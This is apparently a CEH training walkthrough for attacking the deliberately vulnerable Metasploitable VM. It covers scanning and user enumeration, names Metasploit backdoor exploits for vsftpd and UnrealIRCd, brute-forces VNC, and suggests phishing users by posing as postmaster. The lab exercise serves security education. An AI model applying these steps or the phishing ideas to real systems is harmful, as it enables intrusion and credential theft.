CEH v9 : Hacking Metasploitable VM

  • Kali –
  • Metasploitable –
- Hãy thay IP của bạn cho thích hợp

  • 1 Footprinting
    • 1.1 Ping
    • 1.2 Traceroute
  • 2 Scanning
    • 2.1 Port Scanning
    • 2.2 OS Fingerprinting
      • 2.2.1 nmap
      • 2.2.2 xprobe2
  • 3 Enumeration
    • 3.1 FTP (TCP 21) Enumeration
    • 3.2 Telnet (TCP 53) Enumeration
    • 3.3 SMTP (TCP 25) Enumeration
    • 3.4 VNC (TCP 5900) Enumeration
    • 3.5 X11 (TCP 6000) Enumeration
    • 3.6 RLogin (TCP 513) Enumeration
    • 3.7 IRC (TCP 6667) Enumeration
  • 4 Exploitation
    • 4.1 FTP Exploit
    • 4.2 VNC Password Cracking
    • 4.3 IRC Exploit
    • 4.4 Share this:
    • 4.5 Related



There’s 0% packet loss which means the victim is up.


Let’s run traceroute to check if the victim is hidden behind a firewall.
As you can see, there’s only one hop between us and the victim ( No firewall is blocking us.


Port Scanning

Nmap Script Scan
Let’s run a nmap aggressive (-A) scan. This will run a default set of scripts that will probe the running services more deeply.

OS Fingerprinting

We’ll use both nmap and xprobe2 for active OS fingerprinting, as they use different techniques. nmap determines the victim’s TCP/IP stack implementation and from there the OS, while xprobe2 guesses OSs based on how closely it matches a signature in its signature database.


According to the nmap script scan, the OS is: Linux 2.6.x. Also, the victim is running the Ubuntu version of several services like Apache, OpenSSH, and MySQL, which indicates the victim’s Linux distribution to us.


According to xprobe2, the OS is: Linux 2.6.11 . This confirms the nmap results.


FTP (TCP 21) Enumeration

According to our nmap aggressive scan, Anonymous FTP login is enabled. Often times, we can get access to the entire system via FTP. Then, since this is an older Linux system, we can steal /etc/passwd and crack the password hashes using hashcat.
So let’s connect. For the password, type in anything.
Login successful. What do we have access to?
Nothing is listed, so we can’t access the entire machine. However, we can use FTP to upload a malicious executable that would compromise the system. That’s beyond enumeration, however.
Vsftpd 2.3.4 exploit
The nmap -A scan tells us the FTP version, 2.3.4. This FTP version has been backdoored. There’s a Metasploit exploit (exploit/unix/ftp/vsftpd_234_backdoor) for this vulnerability which should give us a command shell. We’ll do this in “Exploitation”.

Telnet (TCP 53) Enumeration

We’re given the login credentials! Let’s log in:
Great! We now have a user-level shell into the victim. We also learned msfadmin is a username. This enables us to brute force passwords.

SMTP (TCP 25) Enumeration

Let’s connect to the victim’s SMTP server using nc (netcat) and enumerate some users using the VRFY command. Let’s try root and msfadmin (which we discovered in “Telnet enumeration”).
Both work. To enumerate more usernames, let’s use a Metasploit module (auxiliary/scanner/smtp/smtp_enum).
Users found: backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
We can use this list of users later on for social engineering attacks. For example, we can masquerade as postmaster and ask an user to email us his username/password. We can also send out malicious payloads, disguised as patches.

VNC (TCP 5900) Enumeration

Let’s connect to vnc using vncviewer:
We need the password to connect using vnc. We try a few basic passwords like the usernames, but they all fail. We can run a brute force attack against vnc. We’ll do this in “Exploitation”.

X11 (TCP 6000) Enumeration

Access Denied. Let’s try to SSH into the victim using the telnet credentials, with X forwarding enabled. (Telnet doesn’t support X forwarding.)
SSH works! Let’s try to open a GUI application like firefox:
Seems like the msfadmin user doesn’t have permission for X forwarding. We can return after rooting the victim.

RLogin (TCP 513) Enumeration

Let’s use rlogin to try to connect as root.
We obtained root access. No password was required at all!

IRC (TCP 6667) Enumeration

The nmap -A scan tells us the victim is running UnrealIRCD, which has been backdoored. We can exploit this vulnerability using an existing Metasploit module in the next section.


FTP Exploit

The victim is running Vsftpd 2.3.4, which has been backdoored. In Metasploit, we use exploit/unix/ftp/vsftpd_234_backdoor:
We’ve obtained a root-level shell!

VNC Password Cracking

Let’s use Metasploit auxiliary module – auxiliary/scanner/vnc/vnc_login – to attack the VNC service.
Password found – password.
Let’s log in with this password.
It works! A vncviewer window opens. Metasploitable is headless which means vncviewer isn’t that helpful to us. However, we can open GUI applications from here. For example, we can open firefox and search for stored passwords. Nevertheless, we have a root shell!

IRC Exploit

Again, the victim is running UnrealIRCD, which has also been backdoored. In Metasploit, let’s use exploit/unix/irc/unreal_ircd_3281_backdoor:
We’ve obtained another root-level shell.